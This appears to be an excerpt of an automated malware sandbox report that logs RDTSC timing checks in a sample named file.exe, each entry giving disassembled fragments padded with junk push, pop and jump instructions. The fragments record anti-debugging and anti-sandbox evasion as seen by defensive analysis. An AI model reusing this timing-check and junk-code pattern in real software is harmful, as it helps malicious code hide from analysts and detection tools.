                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299B85 second address: 299BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F84B0D655F6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FCh 0x00000016 jmp 00007F84B0D65604h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299BB6 second address: 299BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A12B second address: 29A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A12F second address: 29A133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A67C second address: 29A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A681 second address: 29A687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A687 second address: 29A68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A68B second address: 29A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F84B0B050E5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABB9 second address: 29ABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABBD second address: 29ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABC3 second address: 29ABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AF0E second address: 29AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FAED2 second address: 1FAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FAEE4 second address: 1FAEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E00 second address: 2A4E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F84B0D655FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E10 second address: 2A4E28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F84B0B050D6h 0x00000012 jns 00007F84B0B050D6h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E28 second address: 2A4E38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E38 second address: 2A4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E3C second address: 2A4E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E52 second address: 2A4E68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 je 00007F84B0B050D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F84B0B050D6h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E68 second address: 2A4E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4FD0 second address: 2A4FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E1h 0x00000009 jmp 00007F84B0B050E3h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A517F second address: 2A5183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5183 second address: 2A5189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5189 second address: 2A51B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65609h 0x0000000c jg 00007F84B0D655F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51B5 second address: 2A51E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84B0B050E1h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51E0 second address: 2A51F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51F0 second address: 2A51F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5335 second address: 2A5341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A54CA second address: 2A54CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5619 second address: 2A562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0BE5 second address: 2B0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F84B0B050DEh 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0BF7 second address: 2B0C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F84B0D655F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F5FC0 second address: 1F5FF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F84B0B050DEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007F84B0B050D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84B0B050E4h 0x0000001f jmp 00007F84B0B050DAh 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F5FF8 second address: 1F5FFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1D2 second address: 2AF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1DA second address: 2AF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1DE second address: 2AF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF2F9 second address: 2AF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jp 00007F84B0D655FCh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F84B0D655F6h 0x00000015 jmp 00007F84B0D655FBh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF5E3 second address: 2AF60C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F84B0B050DFh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF60C second address: 2AF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF612 second address: 2AF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF616 second address: 2AF62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF62C second address: 2AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF630 second address: 2AF648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AFA39 second address: 2AFA72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F84B0B050DFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AFB9F second address: 2AFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0316 second address: 2B031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B031A second address: 2B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A25 second address: 2B0A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0B050D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A2F second address: 2B0A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A39 second address: 2B0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F84B0B050E9h 0x0000000c popad 0x0000000d jmp 00007F84B0B050E9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F84B0B050E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A7F second address: 2B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A85 second address: 2B0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A89 second address: 2B0A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A8F second address: 2B0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DD8 second address: 2B7DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DDE second address: 2B7DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DE2 second address: 2B7E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65602h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7978 second address: 2B7985 instructions: 0x00000000 rdtsc 0x00000002 js 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7985 second address: 2B798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7AF8 second address: 2B7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7AFE second address: 2B7B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F84B0D655F8h 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7B0B second address: 2B7B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B9488 second address: 2B948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5401 second address: 2C540F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C540F second address: 2C5415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 201AC7 second address: 201ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6C23 second address: 2C6C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6C27 second address: 2C6C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC766 second address: 2CC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC76C second address: 2CC778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F84B0B050D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC371 second address: 2CC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B17 second address: 2D8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B1B second address: 2D8B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65603h 0x0000000c jmp 00007F84B0D655FFh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F84B0D655F6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B4D second address: 2D8B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnp 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1059 second address: 2E1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F84B0D655F6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11C8 second address: 2E11DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84B0B050D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F84B0B050D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1326 second address: 2E1365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65604h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edi 0x0000000c jmp 00007F84B0D65604h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D655FEh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15E0 second address: 2E15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F84B0B050D6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15EF second address: 2E15F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15F5 second address: 2E1600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20C9 second address: 2E20D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F84B0D655F6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20D4 second address: 2E20F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jg 00007F84B0B050D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F84B0B050DDh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20F7 second address: 2E20FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7E60 second address: 2E7E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F84B0B050E4h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F7172 second address: 2F7192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F84B0D65603h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F7192 second address: 2F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007F84B0B050DCh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307990 second address: 30799A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30781B second address: 307820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307820 second address: 307837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FCh 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30989F second address: 3098AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 324B99 second address: 324B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 324B9D second address: 324BA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CCD second address: 328CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CD2 second address: 328CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328F63 second address: 328F68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A449 second address: 32A44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A44D second address: 32A465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A465 second address: 32A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A46C second address: 32A492 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D6560Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F84B0D655F6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A492 second address: 32A4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
